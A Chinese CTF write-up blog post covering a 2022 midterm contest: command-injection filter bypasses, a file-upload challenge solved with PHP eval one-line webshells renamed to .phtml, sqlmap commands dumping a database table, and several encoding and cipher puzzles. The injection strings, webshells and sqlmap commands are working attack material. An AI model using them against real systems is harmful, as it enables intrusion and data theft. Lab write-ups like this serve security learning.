2022期中考核wp

本文介绍了通过命令注入、SQL注入等技术解决一系列网络安全挑战的过程,包括利用管道符、通配符绕过过滤,使用sqlmap工具爆库、爆表并获取flag,以及通过RSA加密解密获取隐藏信息。同时,文章还涉及了对emoji编码和栅栏密码的解析。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

web

**

ping

**
打开题目环境
在这里插入图片描述
先尝试用分号构造命令执行语句:127.0.0.1;ls
发现没有回显,再尝试用管道符:127.0.0.1|ls,发现flag文件

在这里里插入图片描述打开flag文件,构造命令执行语句:127.0.0.1|cat flag.txt
在这里插入图片描述
但是这个flag不是真正的flag,我们再进入index.php文件看一看
在这里插入图片描述
发现源码过滤了红框中的八种符号(这里注意管道符|后面还有一个空格,当时做题的时候就觉得很奇怪为什么过滤了管道符但是还能执行命令,赛后才发现管道符后面还有个空格!)
在这里插入图片描述
用…/返回根目录,看到真正的flag文件了
在这里插入图片描述
在这里插入图片描述
构造命令执行语句:|cat …/…/…/REAL_flLLLAAAag,(或者|cat /REAL_flLLLAAAag)执行后发现没有回显,查看网页源码得到flag,抓包也可以直接看到(好无语当时就差查看源码了。。我还以为我语句构造错了。。)
在这里插入图片描述
**

ping2

**
打开题目环境
在这里插入图片描述
这题比ping1过滤了更多字符,在ping输入框试了一下果然没有回显
我们在url框进行输入,用%0a绕过分号;用%09绕过空格 反斜杠\绕过/
用tac绕过cat
(cat由第一行开始显示内容,并将所有内容输出;tac从最后一行倒叙显示内容,并将所有内容输出)
用通配符*或者?代替单个或多个字符,绕过flag和YunXi

输入?ip=127.0.0.1%0als列出文件名
在这里插入图片描述
查看flag文件,果然又是假的
在这里插入图片描述
进入YunXi文件夹,看到真正的flag了
在这里插入图片描述
cd进入YunXi文件夹查看flag文件
在这里插入图片描述
查看网页源码,得到flag
在这里插入图片描述
这个题也可以用字符串拼接的方法做

**

upload

**
习惯性先传一个平平无奇一句话木马试试

<?php @eval($_POST['password']);?>

在这里插入图片描述
上传后抓包修改文件类型为image\png,得到信息不能为php文件
在这里插入图片描述
php1,php5,Php等均被过滤了,可以修改文件后缀名为phtml
(phtml一般是指嵌入了php代码的html文件,但仍会作为php解析)
在这里插入图片描述
修改文件类型和文件名后上传,显示只能上传jpg和png文件
在这里插入图片描述
直接传一个图片马,用get绕过post,改php为phtml

<?php @eval($_GET['shell']); echo"luck"; ?>

在这里插入图片描述
上传成功,现在需要知道文件保存的路径了,一般是upload/filename,试一下upload
在这里插入图片描述
进入lslsls.phtml文件
在这里插入图片描述
使用get的方式cat flag(注意flag在根目录下!最后不要忘记加分号!)
得到flag了了了了
在这里插入图片描述

**

EZ_sql

**
进入题目环境,小吓一跳
在这里插入图片描述
抓包登录信息 放进post.txt文件
在这里插入图片描述
用sqlmap梭一把
先爆数据库

sqlmap.py -r "C:\Users\86159\Desktop\post.txt" -p u --dbs

在这里插入图片描述
爆表

sqlmap.py -r "C:\Users\86159\Desktop\post.txt" -p u -D challenges --tables

在这里插入图片描述
爆字段

sqlmap.py -r "C:\Users\86159\Desktop\post.txt" -p u -D challenges -T fl44444g -C flag --dump

得到flag
在这里插入图片描述

Crypto&Misc

emo

打开题目文件,是一串emoji表情
在这里插入图片描述
之前看字符编码的时候有看到过关于emoji表情的编码,于是用解码器解码得到:
l{ji1j8-ll2rkj-i46089}g270-03606m0l44-926g

这串字符的形式很像flag,用栅栏密码试试,每组字数为4的时候得到:
lrgm{k20jj7li-041i-4j40-8639-062l806l96g2}

已经很接近flag的形式了,但是仔细观察发现没有f字母,这个时候想到凯撒密码会对字符进行替换,偏移量为6的时候得到flag:
flag{e20dd7fc-041c-4d40-8639-062f806f96a2}

RSA

将rsa.py文件用记事本打开,得到flag
在这里插入图片描述

签到

base64解码两次,url解码一次,去掉最后的7得到flag
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值